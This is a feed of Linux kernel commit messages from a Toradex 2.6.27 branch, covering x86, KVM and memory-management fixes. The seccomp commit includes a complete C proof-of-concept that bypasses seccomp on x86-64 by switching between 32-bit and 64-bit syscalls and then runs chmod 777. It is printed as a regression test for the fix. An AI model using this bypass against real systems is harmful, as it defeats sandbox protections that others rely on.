<feed xmlns='http://www.w3.org/2005/Atom'>
<title>linux-toradex.git/include/asm-x86, branch v2.6.27.54</title>
<subtitle>Linux kernel for Apalis and Colibri modules</subtitle>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/'/>
<entry>
<title>compat: Make compat_alloc_user_space() incorporate the access_ok()</title>
<updated>2010-09-20T20:03:21+00:00</updated>
<author>
<name>H. Peter Anvin</name>
<email>hpa@linux.intel.com</email>
</author>
<published>2010-09-07T23:16:18+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=1d3fb6bbb5c235568f80fd708e5ec6149b5d141c'/>
<id>1d3fb6bbb5c235568f80fd708e5ec6149b5d141c</id>
<content type='text'>
commit c41d68a513c71e35a14f66d71782d27a79a81ea6 upstream.

compat_alloc_user_space() expects the caller to independently call
access_ok() to verify the returned area.  A missing call could
introduce problems on some architectures.

This patch incorporates the access_ok() check into
compat_alloc_user_space() and also adds a sanity check on the length.
The existing compat_alloc_user_space() implementations are renamed
arch_compat_alloc_user_space() and are used as part of the
implementation of the new global function.

This patch assumes NULL will cause __get_user()/__put_user() to either
fail or access userspace on all architectures.  This should be
followed by checking the return value of compat_access_user_space()
for NULL in the callers, at which time the access_ok() in the callers
can also be removed.

Reported-by: Ben Hawkes &lt;hawkes@sota.gen.nz&gt;
Signed-off-by: H. Peter Anvin &lt;hpa@linux.intel.com&gt;
Acked-by: Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt;
Acked-by: Chris Metcalf &lt;cmetcalf@tilera.com&gt;
Acked-by: David S. Miller &lt;davem@davemloft.net&gt;
Acked-by: Ingo Molnar &lt;mingo@elte.hu&gt;
Acked-by: Thomas Gleixner &lt;tglx@linutronix.de&gt;
Acked-by: Tony Luck &lt;tony.luck@intel.com&gt;
Cc: Andrew Morton &lt;akpm@linux-foundation.org&gt;
Cc: Arnd Bergmann &lt;arnd@arndb.de&gt;
Cc: Fenghua Yu &lt;fenghua.yu@intel.com&gt;
Cc: H. Peter Anvin &lt;hpa@zytor.com&gt;
Cc: Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt;
Cc: Helge Deller &lt;deller@gmx.de&gt;
Cc: James Bottomley &lt;jejb@parisc-linux.org&gt;
Cc: Kyle McMartin &lt;kyle@mcmartin.ca&gt;
Cc: Martin Schwidefsky &lt;schwidefsky@de.ibm.com&gt;
Cc: Paul Mackerras &lt;paulus@samba.org&gt;
Cc: Ralf Baechle &lt;ralf@linux-mips.org&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
commit c41d68a513c71e35a14f66d71782d27a79a81ea6 upstream.

compat_alloc_user_space() expects the caller to independently call
access_ok() to verify the returned area.  A missing call could
introduce problems on some architectures.

This patch incorporates the access_ok() check into
compat_alloc_user_space() and also adds a sanity check on the length.
The existing compat_alloc_user_space() implementations are renamed
arch_compat_alloc_user_space() and are used as part of the
implementation of the new global function.

This patch assumes NULL will cause __get_user()/__put_user() to either
fail or access userspace on all architectures.  This should be
followed by checking the return value of compat_access_user_space()
for NULL in the callers, at which time the access_ok() in the callers
can also be removed.

Reported-by: Ben Hawkes &lt;hawkes@sota.gen.nz&gt;
Signed-off-by: H. Peter Anvin &lt;hpa@linux.intel.com&gt;
Acked-by: Benjamin Herrenschmidt &lt;benh@kernel.crashing.org&gt;
Acked-by: Chris Metcalf &lt;cmetcalf@tilera.com&gt;
Acked-by: David S. Miller &lt;davem@davemloft.net&gt;
Acked-by: Ingo Molnar &lt;mingo@elte.hu&gt;
Acked-by: Thomas Gleixner &lt;tglx@linutronix.de&gt;
Acked-by: Tony Luck &lt;tony.luck@intel.com&gt;
Cc: Andrew Morton &lt;akpm@linux-foundation.org&gt;
Cc: Arnd Bergmann &lt;arnd@arndb.de&gt;
Cc: Fenghua Yu &lt;fenghua.yu@intel.com&gt;
Cc: H. Peter Anvin &lt;hpa@zytor.com&gt;
Cc: Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt;
Cc: Helge Deller &lt;deller@gmx.de&gt;
Cc: James Bottomley &lt;jejb@parisc-linux.org&gt;
Cc: Kyle McMartin &lt;kyle@mcmartin.ca&gt;
Cc: Martin Schwidefsky &lt;schwidefsky@de.ibm.com&gt;
Cc: Paul Mackerras &lt;paulus@samba.org&gt;
Cc: Ralf Baechle &lt;ralf@linux-mips.org&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</pre>
</div>
</content>
</entry>
<entry>
<title>KVM: VMX: Check cpl before emulating debug register access</title>
<updated>2010-04-01T22:52:24+00:00</updated>
<author>
<name>Avi Kivity</name>
<email>avi@redhat.com</email>
</author>
<published>2009-09-01T09:03:25+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=0a32cd3d6adbe5cbfdfb411e1b1fccceec75e36a'/>
<id>0a32cd3d6adbe5cbfdfb411e1b1fccceec75e36a</id>
<content type='text'>
commit 0a79b009525b160081d75cef5dbf45817956acf2 upstream.

Debug registers may only be accessed from cpl 0.  Unfortunately, vmx will
code to emulate the instruction even though it was issued from guest
userspace, possibly leading to an unexpected trap later.

Signed-off-by: Avi Kivity &lt;avi@redhat.com&gt;
Signed-off-by: Marcelo Tosatti &lt;mtosatti@redhat.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;


</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
commit 0a79b009525b160081d75cef5dbf45817956acf2 upstream.

Debug registers may only be accessed from cpl 0.  Unfortunately, vmx will
code to emulate the instruction even though it was issued from guest
userspace, possibly leading to an unexpected trap later.

Signed-off-by: Avi Kivity &lt;avi@redhat.com&gt;
Signed-off-by: Marcelo Tosatti &lt;mtosatti@redhat.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;


</pre>
</div>
</content>
</entry>
<entry>
<title>KVM: x86 emulator: limit instructions to 15 bytes</title>
<updated>2010-04-01T22:52:23+00:00</updated>
<author>
<name>Avi Kivity</name>
<email>avi@redhat.com</email>
</author>
<published>2009-11-24T11:20:15+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=8b91c56fd291670294e197bc2d25ba3844cc53fa'/>
<id>8b91c56fd291670294e197bc2d25ba3844cc53fa</id>
<content type='text'>
commit eb3c79e64a70fb8f7473e30fa07e89c1ecc2c9bb upstream

[ &lt;cebbert@redhat.com&gt;: backport to 2.6.27 ]

While we are never normally passed an instruction that exceeds 15 bytes,
smp games can cause us to attempt to interpret one, which will cause
large latencies in non-preempt hosts.

Signed-off-by: Avi Kivity &lt;avi@redhat.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
commit eb3c79e64a70fb8f7473e30fa07e89c1ecc2c9bb upstream

[ &lt;cebbert@redhat.com&gt;: backport to 2.6.27 ]

While we are never normally passed an instruction that exceeds 15 bytes,
smp games can cause us to attempt to interpret one, which will cause
large latencies in non-preempt hosts.

Signed-off-by: Avi Kivity &lt;avi@redhat.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</pre>
</div>
</content>
</entry>
<entry>
<title>x86: fix csum_ipv6_magic asm memory clobber</title>
<updated>2010-04-01T22:52:19+00:00</updated>
<author>
<name>Samuel Thibault</name>
<email>samuel.thibault@ens-lyon.org</email>
</author>
<published>2009-10-01T22:44:02+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=e965c3dcb699d946bf7faac5a6b0e3149ec66780'/>
<id>e965c3dcb699d946bf7faac5a6b0e3149ec66780</id>
<content type='text'>
commit 392d814daf460a9564d29b2cebc51e1ea34e0504 upstream.

Just like ip_fast_csum, the assembly snippet in csum_ipv6_magic needs a
memory clobber, as it is only passed the address of the buffer, not a
memory reference to the buffer itself.

This caused failures in Hurd's pfinetv4 when we tried to compile it with
gcc-4.3 (bogus checksums).

Signed-off-by: Samuel Thibault &lt;samuel.thibault@ens-lyon.org&gt;
Cc: Ingo Molnar &lt;mingo@elte.hu&gt;
Cc: Thomas Gleixner &lt;tglx@linutronix.de&gt;
Cc: "H. Peter Anvin" &lt;hpa@zytor.com&gt;
Acked-by: "David S. Miller" &lt;davem@davemloft.net&gt;
Cc: Andi Kleen &lt;andi@firstfloor.org&gt;
Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt;
Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
commit 392d814daf460a9564d29b2cebc51e1ea34e0504 upstream.

Just like ip_fast_csum, the assembly snippet in csum_ipv6_magic needs a
memory clobber, as it is only passed the address of the buffer, not a
memory reference to the buffer itself.

This caused failures in Hurd's pfinetv4 when we tried to compile it with
gcc-4.3 (bogus checksums).

Signed-off-by: Samuel Thibault &lt;samuel.thibault@ens-lyon.org&gt;
Cc: Ingo Molnar &lt;mingo@elte.hu&gt;
Cc: Thomas Gleixner &lt;tglx@linutronix.de&gt;
Cc: "H. Peter Anvin" &lt;hpa@zytor.com&gt;
Acked-by: "David S. Miller" &lt;davem@davemloft.net&gt;
Cc: Andi Kleen &lt;andi@firstfloor.org&gt;
Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt;
Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</pre>
</div>
</content>
</entry>
<entry>
<title>x86: Increase MIN_GAP to include randomized stack</title>
<updated>2009-10-12T18:33:15+00:00</updated>
<author>
<name>Michal Hocko</name>
<email>mhocko@suse.cz</email>
</author>
<published>2009-10-07T21:38:24+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=2578cf95969936c372db29ee2bbc21c9b6a299aa'/>
<id>2578cf95969936c372db29ee2bbc21c9b6a299aa</id>
<content type='text'>
[ trivial backport to 2.6.27: Chuck Ebbert &lt;cebbert@redhat.com&gt; ]

commit 80938332d8cf652f6b16e0788cf0ca136befe0b5 upstream.

Currently we are not including randomized stack size when calculating
mmap_base address in arch_pick_mmap_layout for topdown case. This might
cause that mmap_base starts in the stack reserved area because stack is
randomized by 1GB for 64b (8MB for 32b) and the minimum gap is 128MB.

If the stack really grows down to mmap_base then we can get silent mmap
region overwrite by the stack values.

Let's include maximum stack randomization size into MIN_GAP which is
used as the low bound for the gap in mmap.

Signed-off-by: Michal Hocko &lt;mhocko@suse.cz&gt;
LKML-Reference: &lt;1252400515-6866-1-git-send-email-mhocko@suse.cz&gt;
Acked-by: Jiri Kosina &lt;jkosina@suse.cz&gt;
Signed-off-by: H. Peter Anvin &lt;hpa@zytor.com&gt;
Cc: Chuck Ebbert &lt;cebbert@redhat.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;


</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
[ trivial backport to 2.6.27: Chuck Ebbert &lt;cebbert@redhat.com&gt; ]

commit 80938332d8cf652f6b16e0788cf0ca136befe0b5 upstream.

Currently we are not including randomized stack size when calculating
mmap_base address in arch_pick_mmap_layout for topdown case. This might
cause that mmap_base starts in the stack reserved area because stack is
randomized by 1GB for 64b (8MB for 32b) and the minimum gap is 128MB.

If the stack really grows down to mmap_base then we can get silent mmap
region overwrite by the stack values.

Let's include maximum stack randomization size into MIN_GAP which is
used as the low bound for the gap in mmap.

Signed-off-by: Michal Hocko &lt;mhocko@suse.cz&gt;
LKML-Reference: &lt;1252400515-6866-1-git-send-email-mhocko@suse.cz&gt;
Acked-by: Jiri Kosina &lt;jkosina@suse.cz&gt;
Signed-off-by: H. Peter Anvin &lt;hpa@zytor.com&gt;
Cc: Chuck Ebbert &lt;cebbert@redhat.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;


</pre>
</div>
</content>
</entry>
<entry>
<title>KVM: Reduce stack usage in kvm_pv_mmu_op()</title>
<updated>2009-09-09T03:17:12+00:00</updated>
<author>
<name>Dave Hansen</name>
<email>dave@linux.vnet.ibm.com</email>
</author>
<published>2009-08-06T17:39:52+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=ea618866ead0126be93107cdf700b43e7c1854f3'/>
<id>ea618866ead0126be93107cdf700b43e7c1854f3</id>
<content type='text'>
(cherry picked from commit 6ad18fba05228fb1d47cdbc0339fe8b3fca1ca26)

We're in a hot path.  We can't use kmalloc() because
it might impact performance.  So, we just stick the buffer that
we need into the kvm_vcpu_arch structure.  This is used very
often, so it is not really a waste.

We also have to move the buffer structure's definition to the
arch-specific x86 kvm header.

Signed-off-by: Dave Hansen &lt;dave@linux.vnet.ibm.com&gt;
Signed-off-by: Avi Kivity &lt;avi@qumranet.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;
</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
(cherry picked from commit 6ad18fba05228fb1d47cdbc0339fe8b3fca1ca26)

We're in a hot path.  We can't use kmalloc() because
it might impact performance.  So, we just stick the buffer that
we need into the kvm_vcpu_arch structure.  This is used very
often, so it is not really a waste.

We also have to move the buffer structure's definition to the
arch-specific x86 kvm header.

Signed-off-by: Dave Hansen &lt;dave@linux.vnet.ibm.com&gt;
Signed-off-by: Avi Kivity &lt;avi@qumranet.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;
</pre>
</div>
</content>
</entry>
<entry>
<title>x86: fix assembly constraints in native_save_fl()</title>
<updated>2009-08-16T21:26:52+00:00</updated>
<author>
<name>H. Peter Anvin</name>
<email>hpa@zytor.com</email>
</author>
<published>2009-08-03T23:33:40+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=04101e4e4ef4ff5035ce5ad4510db02eb54c4985'/>
<id>04101e4e4ef4ff5035ce5ad4510db02eb54c4985</id>
<content type='text'>
commit f1f029c7bfbf4ee1918b90a431ab823bed812504 upstream.

From Gabe Black in bugzilla 13888:

native_save_fl is implemented as follows:

  11static inline unsigned long native_save_fl(void)
  12{
  13        unsigned long flags;
  14
  15        asm volatile("# __raw_save_flags\n\t"
  16                     "pushf ; pop %0"
  17                     : "=g" (flags)
  18                     : /* no input */
  19                     : "memory");
  20
  21        return flags;
  22}

If gcc chooses to put flags on the stack, for instance because this is
inlined into a larger function with more register pressure, the offset
of the flags variable from the stack pointer will change when the
pushf is performed. gcc doesn't attempt to understand that fact, and
address used for pop will still be the same. It will write to
somewhere near flags on the stack but not actually into it and
overwrite some other value.

I saw this happen in the ide_device_add_all function when running in a
simulator I work on. I'm assuming that some quirk of how the simulated
hardware is set up caused the code path this is on to be executed when
it normally wouldn't.

A simple fix might be to change "=g" to "=r".

Reported-by: Gabe Black &lt;spamforgabe@umich.edu&gt;
Signed-off-by: H. Peter Anvin &lt;hpa@zytor.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
commit f1f029c7bfbf4ee1918b90a431ab823bed812504 upstream.

From Gabe Black in bugzilla 13888:

native_save_fl is implemented as follows:

  11static inline unsigned long native_save_fl(void)
  12{
  13        unsigned long flags;
  14
  15        asm volatile("# __raw_save_flags\n\t"
  16                     "pushf ; pop %0"
  17                     : "=g" (flags)
  18                     : /* no input */
  19                     : "memory");
  20
  21        return flags;
  22}

If gcc chooses to put flags on the stack, for instance because this is
inlined into a larger function with more register pressure, the offset
of the flags variable from the stack pointer will change when the
pushf is performed. gcc doesn't attempt to understand that fact, and
address used for pop will still be the same. It will write to
somewhere near flags on the stack but not actually into it and
overwrite some other value.

I saw this happen in the ide_device_add_all function when running in a
simulator I work on. I'm assuming that some quirk of how the simulated
hardware is set up caused the code path this is on to be executed when
it normally wouldn't.

A simple fix might be to change "=g" to "=r".

Reported-by: Gabe Black &lt;spamforgabe@umich.edu&gt;
Signed-off-by: H. Peter Anvin &lt;hpa@zytor.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</pre>
</div>
</content>
</entry>
<entry>
<title>Fix misreporting of #cores as #hyperthreads for Q9550</title>
<updated>2009-03-23T22:00:04+00:00</updated>
<author>
<name>Joe Korty</name>
<email>joe.korty@ccur.com</email>
</author>
<published>2009-03-19T17:27:44+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=55ec5cadc315fee6950e5a04d54694da3baf2f69'/>
<id>55ec5cadc315fee6950e5a04d54694da3baf2f69</id>
<content type='text'>
Fix misreporting of #cores for the Intel Quad Core Q9550.

For the Q9550, in x86_64 mode, /proc/cpuinfo mistakenly
reports the #cores present as the #hyperthreads present.
i386 mode was not examined but is assumed to have the
same problem.

A backport of the following three 2.6.29-rc1 patches
fixes the problem:
  066941bd4eeb159307a5d7d795100d0887c00442:
    [PATCH] x86: unmask CPUID levels on Intel CPUs
  99fb4d349db7e7dacb2099c5cc320a9e2d31c1ef:
    [PATCH] x86: unmask CPUID levels on Intel CPUs, fix
  bdf21a49bab28f0d9613e8d8724ef9c9168b61b9:
    [PATCH] x86: add MSR_IA32_MISC_ENABLE bits to &lt;asm/msr-index.h&gt;

From the first patch: "If the CPUID limit bit in
MSR_IA32_MISC_ENABLE is set, clear it to make all CPUID
information available.  This is required for some features
to work, in particular XSAVE."

Originally-Developed-by: H. Peter Anvin &lt;hpa@linux.intel.com&gt;
Backported-by: Joe Korty &lt;joe.korty@ccur.com&gt;
Cc: Ingo Molnar &lt;mingo@elte.hu&gt;
Signed-off-by: Joe Korty &lt;joe.korty@ccur.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
Fix misreporting of #cores for the Intel Quad Core Q9550.

For the Q9550, in x86_64 mode, /proc/cpuinfo mistakenly
reports the #cores present as the #hyperthreads present.
i386 mode was not examined but is assumed to have the
same problem.

A backport of the following three 2.6.29-rc1 patches
fixes the problem:
  066941bd4eeb159307a5d7d795100d0887c00442:
    [PATCH] x86: unmask CPUID levels on Intel CPUs
  99fb4d349db7e7dacb2099c5cc320a9e2d31c1ef:
    [PATCH] x86: unmask CPUID levels on Intel CPUs, fix
  bdf21a49bab28f0d9613e8d8724ef9c9168b61b9:
    [PATCH] x86: add MSR_IA32_MISC_ENABLE bits to &lt;asm/msr-index.h&gt;

From the first patch: "If the CPUID limit bit in
MSR_IA32_MISC_ENABLE is set, clear it to make all CPUID
information available.  This is required for some features
to work, in particular XSAVE."

Originally-Developed-by: H. Peter Anvin &lt;hpa@linux.intel.com&gt;
Backported-by: Joe Korty &lt;joe.korty@ccur.com&gt;
Cc: Ingo Molnar &lt;mingo@elte.hu&gt;
Signed-off-by: Joe Korty &lt;joe.korty@ccur.com&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</pre>
</div>
</content>
</entry>
<entry>
<title>x86-64: seccomp: fix 32/64 syscall hole</title>
<updated>2009-03-17T00:52:59+00:00</updated>
<author>
<name>Roland McGrath</name>
<email>roland@redhat.com</email>
</author>
<published>2009-02-28T07:25:54+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=47f5f3195be6fcaba3646c68b84704634f241d46'/>
<id>47f5f3195be6fcaba3646c68b84704634f241d46</id>
<content type='text'>
commit 5b1017404aea6d2e552e991b3fd814d839e9cd67 upstream.

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include &lt;assert.h&gt;
	#include &lt;inttypes.h&gt;
	#include &lt;stdio.h&gt;
	#include &lt;linux/prctl.h&gt;
	#include &lt;sys/stat.h&gt;
	#include &lt;unistd.h&gt;
	#include &lt;asm/unistd.h&gt;

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot &lt; (1UL &lt;&lt; 32));
	  asm ("int $0x80 # %0 &lt;- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 &lt;- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&amp;st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -&gt; st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath &lt;roland@redhat.com&gt;
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
commit 5b1017404aea6d2e552e991b3fd814d839e9cd67 upstream.

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include &lt;assert.h&gt;
	#include &lt;inttypes.h&gt;
	#include &lt;stdio.h&gt;
	#include &lt;linux/prctl.h&gt;
	#include &lt;sys/stat.h&gt;
	#include &lt;unistd.h&gt;
	#include &lt;asm/unistd.h&gt;

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot &lt; (1UL &lt;&lt; 32));
	  asm ("int $0x80 # %0 &lt;- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 &lt;- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&amp;st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -&gt; st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath &lt;roland@redhat.com&gt;
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</pre>
</div>
</content>
</entry>
<entry>
<title>mm: clean up for early_pfn_to_nid()</title>
<updated>2009-03-17T00:52:45+00:00</updated>
<author>
<name>KAMEZAWA Hiroyuki</name>
<email>kamezawa.hiroyu@jp.fujitsu.com</email>
</author>
<published>2009-02-18T22:48:32+00:00</published>
<link rel='alternate' type='text/html' href='https://git.toradex.cn/cgit/linux-toradex.git/commit/?id=819aa5607804c588ea669584bbeb8f92df021022'/>
<id>819aa5607804c588ea669584bbeb8f92df021022</id>
<content type='text'>
commit f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 upstream.

What's happening is that the assertion in mm/page_alloc.c:move_freepages()
is triggering:

	BUG_ON(page_zone(start_page) != page_zone(end_page));

Once I knew this is what was happening, I added some annotations:

	if (unlikely(page_zone(start_page) != page_zone(end_page))) {
		printk(KERN_ERR "move_freepages: Bogus zones: "
		       "start_page[%p] end_page[%p] zone[%p]\n",
		       start_page, end_page, zone);
		printk(KERN_ERR "move_freepages: "
		       "start_zone[%p] end_zone[%p]\n",
		       page_zone(start_page), page_zone(end_page));
		printk(KERN_ERR "move_freepages: "
		       "start_pfn[0x%lx] end_pfn[0x%lx]\n",
		       page_to_pfn(start_page), page_to_pfn(end_page));
		printk(KERN_ERR "move_freepages: "
		       "start_nid[%d] end_nid[%d]\n",
		       page_to_nid(start_page), page_to_nid(end_page));
 ...

And here's what I got:

	move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00]
	move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00]
	move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff]
	move_freepages: start_nid[1] end_nid[0]

My memory layout on this box is:

[    0.000000] Zone PFN ranges:
[    0.000000]   Normal   0x00000000 -&gt; 0x0081ff5d
[    0.000000] Movable zone start PFN for each node
[    0.000000] early_node_map[8] active PFN ranges
[    0.000000]     0: 0x00000000 -&gt; 0x00020000
[    0.000000]     1: 0x00800000 -&gt; 0x0081f7ff
[    0.000000]     1: 0x0081f800 -&gt; 0x0081fe50
[    0.000000]     1: 0x0081fed1 -&gt; 0x0081fed8
[    0.000000]     1: 0x0081feda -&gt; 0x0081fedb
[    0.000000]     1: 0x0081fedd -&gt; 0x0081fee5
[    0.000000]     1: 0x0081fee7 -&gt; 0x0081ff51
[    0.000000]     1: 0x0081ff59 -&gt; 0x0081ff5d

So it's a block move in that 0x81f600--&gt;0x81f7ff region which triggers
the problem.

This patch:

Declaration of early_pfn_to_nid() is scattered over per-arch include
files, and it seems it's complicated to know when the declaration is used.
 I think it makes fix-for-memmap-init not easy.

This patch moves all declaration to include/linux/mm.h

After this,
  if !CONFIG_NODES_POPULATES_NODE_MAP &amp;&amp; !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
     -&gt; Use static definition in include/linux/mm.h
  else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
     -&gt; Use generic definition in mm/page_alloc.c
  else
     -&gt; per-arch back end function will be called.

Signed-off-by: KAMEZAWA Hiroyuki &lt;kamezawa.hiroyu@jp.fujitsu.com&gt;
Tested-by: KOSAKI Motohiro &lt;kosaki.motohiro@jp.fujitsu.com&gt;
Reported-by: David Miller &lt;davem@davemlloft.net&gt;
Cc: Mel Gorman &lt;mel@csn.ul.ie&gt;
Cc: Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt;
Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt;
Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</content>
<content type='xhtml'>
<div xmlns='http://www.w3.org/1999/xhtml'>
<pre>
commit f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 upstream.

What's happening is that the assertion in mm/page_alloc.c:move_freepages()
is triggering:

	BUG_ON(page_zone(start_page) != page_zone(end_page));

Once I knew this is what was happening, I added some annotations:

	if (unlikely(page_zone(start_page) != page_zone(end_page))) {
		printk(KERN_ERR "move_freepages: Bogus zones: "
		       "start_page[%p] end_page[%p] zone[%p]\n",
		       start_page, end_page, zone);
		printk(KERN_ERR "move_freepages: "
		       "start_zone[%p] end_zone[%p]\n",
		       page_zone(start_page), page_zone(end_page));
		printk(KERN_ERR "move_freepages: "
		       "start_pfn[0x%lx] end_pfn[0x%lx]\n",
